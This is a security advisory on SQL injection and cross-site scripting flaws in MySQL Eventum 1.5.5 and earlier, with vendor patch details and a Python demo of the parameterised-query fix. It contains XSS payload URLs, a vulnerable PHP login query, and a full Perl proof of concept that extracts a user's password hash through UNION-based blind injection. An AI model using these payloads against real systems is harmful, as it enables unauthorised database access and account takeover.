MySQL Eventum Multiple Remote SQL Injection Vulnerabilities
Release date: 2005-08-02
Updated: 2005-08-02
Affected systems:
MySQL AB Eventum <= 1.5.5
Unaffected systems:
MySQL AB Eventum 1.6
Description:
BUGTRAQ ID: 14437
Eventum is a flexible issue tracking system used to track inbound technical support requests or to organise tasks and bugs.
Eventum contains multiple SQL injection and cross-site scripting vulnerabilities; a remote attacker could exploit them to gain unauthorised access to the database.
Cross-site scripting:
http://eventum/view.php?id=1'%22%3E%3Ciframe%3E
http://eventum/list.php?keywords=&users=&category=&release=%22%3E%3Ciframe%3E
http://eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E
A malicious user could exploit this vulnerability to steal sensitive user information or to run malicious script in the context of the victim user's web browser.
SQL injection:
In /includes/class.auth.php:
/**
 * Checks whether the provided password match against the email
 * address provided.
 *
 * @access public
 * @param string $email The email address to check for
 * @param string $password The password of the user to check for
 * @return boolean
 */
function isCorrectPassword($email, $password)
{
    $stmt = "SELECT usr_password FROM " . APP_DEFAULT_DB . "." . APP_TABLE_PREFIX . "user WHERE usr_email='$email'";
    $passwd = $GLOBALS["db_api"]->dbh->getOne($stmt);
    if (PEAR::isError($passwd)) {
        Error_Handler::logError(array($passwd->getMessage(), $passwd->getDebugInfo()), __FILE__, __LINE__);
        return false;
    } else {
        if ($passwd != md5($password)) {
            return false;
        } else {
            return true;
        }
    }
}
MySQL Eventum does not filter the $email variable, so if the target host uses a database that supports UNION, an attacker can override the returned password hash and bypass the password check. The same flaw exists in userExists(), which is used alongside the isCorrectPassword function. There are also several other SQL injection vulnerabilities:
/reports/custom_fields.php->/includes/class.report.php->getCustomFieldReport()
/reports/custom_fields_graph.php->/includes/class.report.php->getCustomFieldReport()
/manage/releases.php->/includes/class.release.php->insert()
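To make the fix concrete, here is an added Python/SQLite model of the pattern (example code, not Eventum's own; the eventum_user table, the user row and the password are constructed for the demo). The first function interpolates the e-mail into the query exactly as the advisory's isCorrectPassword() does; the second binds it as a parameter, which is the standard remedy for this class of bug.

```python
import hashlib
import hmac
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the eventum_user table (not Eventum's real schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE eventum_user (usr_id INTEGER, usr_email TEXT, usr_password TEXT)")
    db.execute("INSERT INTO eventum_user VALUES (2, 'admin@example.org', ?)",
               (hashlib.md5(b"s3cret").hexdigest(),))
    return db


def is_correct_password_vulnerable(db, email, password):
    # Same shape as the advisory's isCorrectPassword(): the caller-supplied
    # e-mail is interpolated straight into the SQL text.
    stmt = f"SELECT usr_password FROM eventum_user WHERE usr_email='{email}'"
    row = db.execute(stmt).fetchone()
    if row is None:
        return False
    return row[0] == hashlib.md5(password.encode()).hexdigest()


def is_correct_password_fixed(db, email, password):
    # Parameterised query: the e-mail travels as a bound value, so quotes or
    # a UNION inside it can never change which rows the statement returns.
    row = db.execute("SELECT usr_password FROM eventum_user WHERE usr_email=?",
                     (email,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; unsalted MD5 is kept only to mirror the
    # advisory's code and is a separate weakness.
    return hmac.compare_digest(row[0], hashlib.md5(password.encode()).hexdigest())


def demo():
    # A UNION in the e-mail field makes the vulnerable query return a hash the
    # caller already knows the preimage of, so the comparison succeeds without
    # the real password; the parameterised version simply finds no such user.
    db = make_db()
    known = "dance"
    forged_email = "' UNION SELECT '" + hashlib.md5(known.encode()).hexdigest() + "'--"
    return (is_correct_password_vulnerable(db, forged_email, known),
            is_correct_password_fixed(db, forged_email, known))


if __name__ == "__main__":
    print(demo())  # (True, False)
```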
<*Source: James Bercegay (security@gulftech.org)
Joao Prado Maia
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112292193807958&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
use IO::Socket;
use strict;
print "#############################################\n";
print "# MySQL Eventum <= v1.5.5 SQL Injection PoC #\n";
print "# James Bercegay // gulftech.org // 7-28-05 #\n";
print "#############################################\n";
my $host = 'localhost';
my $path = '/eventum/login.php';
my $user = '2';
my $port = 80;
my $pass = '';
my @char = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
print "[*] Trying $host\n";
OUTER: for ( my $i = 1; $i < 33; $i++ )
{
    INNER: for ( my $j=0; $j < 16; $j++ )
    {
        my $used = $char[$j];
        my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $host\n";
        my $post = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+MID(usr_password,$i,1)='$used'%2F*&passwd=dance&Submit=Login";
        my $send = "POST $path HTTP/1.1\r\n";
        $send .= "Host: $host\r\n";
        $send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
        $send .= "Connection: Keep-Alive\r\n";
        $send .= "Content-type: application/x-www-form-urlencoded\r\n";
        $send .= "Content-length: ".length($post)."\r\n\r\n";
        $send .= "$post\r\n\r\n";
        print $sock $send;
        while ( my $line = <$sock> )
        {
            if ( $line =~ /(.*)err=7(.*)/is )
            {
                $pass .= $used;
                print "[+] Char $i is $used\n";
                last INNER;
            }
            #/if
        }
        #/while
        close($sock);
    }
    #/for INNER
    if ( length($pass) < 1 )
    {
        print "[!] Host not vulnerable!";
        exit;
    }
}
#/for OUTER
print "[+] Pass hash is $pass\n";
exit;
Recommendations:
Vendor patch:
MySQL AB
--------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
http://lists.mysql.com/eventum-users/2072